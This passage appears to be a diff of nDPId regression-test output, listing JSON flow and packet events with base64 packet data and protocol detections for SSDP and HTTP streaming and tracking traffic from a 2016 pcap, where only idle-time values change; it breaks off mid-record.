00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1467353163154,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353163154,"pkt":"AQBef\/\/6bEAIlAI6CABFAACljZ0AAAERddjAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165300,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGfJAAIAG0FjAqHMIymwO7MU\/AFBSz4AccUHHfVAYQTf+XQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDcmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1467353165410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353165410,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5NehAADMGBE7KbA7swKhzCABQxT9xQcd9Us+DmFAYACAMewAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAAUUGh1AAIAGeifAqHMIZePIC8VAAFBgEsEemWlGj1AQ\/\/DZSAAAR0VUIC90cmFjazI\/YT0wJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxNjUmYz05NjY1NDJjODJhNTY5NGQwZTk0M2Q1MGQ1ZmNmNWE1NSZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTQ5MzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTIzNDQ3JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPThlZGI2OTRjOGM4Y2NhOTIzZDNlYWU2NjIyZjlhZWU2JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU0ODU4JnZlPTEmdz00LDUgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} -01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAADjGh5AAIAGflfAqHMIZePIC8VAAFBgEsYKmWlGj1AY\/\/BFbwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} -00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1467353165492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353165492,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkdU5AAC8Gc+Zl48gLwKhzCABQxUCZaUaPYBLGxVAYP\/ygXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1004,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1004,"pkt_l4_len":970,"thread_ts_msec":1467353165563,"pkt":"TF4M6gNlABxCjnAxCABFAAPeGjdAAIAGvYPAqHMIe31wMcVBAFAj7VXd5qVx9VAYQTcqlQAAR0VUIC9ta3QuZ2lmP2FpPTg0NTI4OTE5MDBjOTAzYWU3YTg3NjQ0NzkyM2E1YWVjJmV0PTAgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEhfTUtUX0NMS0lEPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBIX01LVF9DTEtMT0c9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} -00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1467353165612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165612,"pkt":"ABxCjnAxTF4M6gNlCABFAADj3khAAC0GT217fXAxwKhzCABQxUHmpXH1I+1Zk1AYAIIWkgAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvZ2lmDQpDYWNoZS1Db250cm9sOiBwcml2YXRlLCBtYXgtYWdlPTAsIG5vLWNhY2hlDQpQcmFnbWE6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjowNSBHTVQNClNlcnZlcjogYXBhY2hlDQoNCg=="} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1467353165616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165616,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGkVAAIAG0AXAqHMIymwO7MU\/AFBSz4OYcUHIDlAYQRL3fAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDkmc2g9JnNxPSZzdz0mdD1zdCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1467353165659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1467353165659,"pkt":"ABxCjnAxTF4M6gNlCABFAAAo3kpAAC0GUCZ7fXAxwKhzCABQxUHmpXKwI+1ZlFARAILziAAAAAAAAAAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1467353165300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165300,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGfJAAIAG0FjAqHMIymwO7MU\/AFBSz4AccUHHfVAYQTf+XQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDcmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 